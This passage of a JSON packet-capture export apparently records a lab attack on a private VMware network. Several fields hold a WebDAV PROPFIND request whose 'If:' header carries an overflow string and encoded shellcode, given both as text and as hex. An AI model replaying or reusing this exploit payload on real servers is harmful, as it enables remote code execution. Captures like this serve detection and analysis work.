"http.request.line": "If: <http://192.168.68.1:80/HWiOQHpufdFfiQhCRJduaixNBxUOkCDRnSXtxqiOvtwscGDilWlUkPPNVhHe<48><65><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/mKtltJRZxMCsJaXFRUHKlEePbTaYoSwsQRetePRIzWdSuwRBZKSnVMsQdQkB<6B><42><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "640"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.930250000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.930250000",
|
||
"frame.time_delta": "0.000006000",
|
||
"frame.time_delta_displayed": "0.003588000",
|
||
"frame.time_relative": "17.181190000",
|
||
"frame.number": "647",
|
||
"frame.len": "247",
|
||
"frame.cap_len": "247",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "233",
|
||
"ip.id": "0x000050c7",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x0000dfe0",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "42063",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "42063",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "87",
|
||
"tcp.len": "181",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "3306671518",
|
||
"tcp.nxtseq": "1630",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "3495451208",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x0000c8d4",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:c2:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:c2:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868738",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000390000",
|
||
"tcp.analysis.bytes_in_flight": "1629",
|
||
"tcp.analysis.push_bytes_sent": "1629"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000623000",
|
||
"tcp.time_delta": "0.000006000"
|
||
},
|
||
"tcp.payload": "30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "646",
|
||
"tcp.segment": "647",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1629",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:42:44:59:41:6f:56:4c:71:56:46:78:43:46:4c:4d:6e:63:58:43:6b:4a:6c:77:59:61:59:56:6d:46:56:41:43:50:58:6d:69:59:57:55:70:74:6b:77:73:5a:59:49:67:4a:47:6d:56:43:42:42:77:49:58:47:e7:85:94:e4:b5:b1:e5:8d:a2:e4:85:83:e6:a9:aa:e6:95:a7:e6:85:b9:e4:89:b6:e6:ad:8e:e6:99:ae:e5:99:89:e7:99:ac:e6:a5:ab:e6:a5:98:e7:a9:a5:e5:9d:a3:c8:82:c8:82:e1:8b:80:e6:a0:83:e6:a9:8c:e4:a5:b6:e4:bd:a8:e6:89:a4:e7:a1:a6:e4:a1:b5:e6:a1:a3:e6:8d:87:e7:95:8d:e5:85:a9:e6:95:b1:e7:81:88:e6:a5:a8:e7:95:94:e7:95:86:e6:ad:b1:e6:9d:99:e6:8d:88:e4:ad:91:e7:a9:af:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:44:52:43:65:6f:78:53:4c:4c:41:72:6c:61:50:70:56:43:49:6b:4a:61:70:67:53:44:4f:46:4d:42:63:65:57:53:73:5a:64:53:74:65:43:58:42:55:53:67:59:61:65:6a:69:72:4e:62:6f:76:73:73:73:6f:e6:8d:b2:e4:b9:97:e7:99:ba:e6:bd:a9:e5:a9:97:e7:81:89:e4:b5:89:e6:bd:ab:e4:b1:87:e4:b5:8f:e7:a1:89:e4:ad:88:e6:91:96:e4:b9:8e:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e7:99:a5:e4:95:96:e4:b9:a7:e4:9d:a7:e1:8f:80:e6:a0:83:e6:91:af:e4:b9:b1:e7:85:a7:e4:b1:a9:e7:91:a8:e4:b5:a7:e6:99:85:e6:a9:ab:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/BDYAoVLqVFxCFLMncXCkJlwYaYVmFVACPXmiYWUptkwsZYIgJGmVCBBwIXG<58><47><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/DRCeoxSLLArlaPpVCIkJapgSDOFMBceWSsZdSteCXBUSgYaejirNbovssso<73><6F><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaF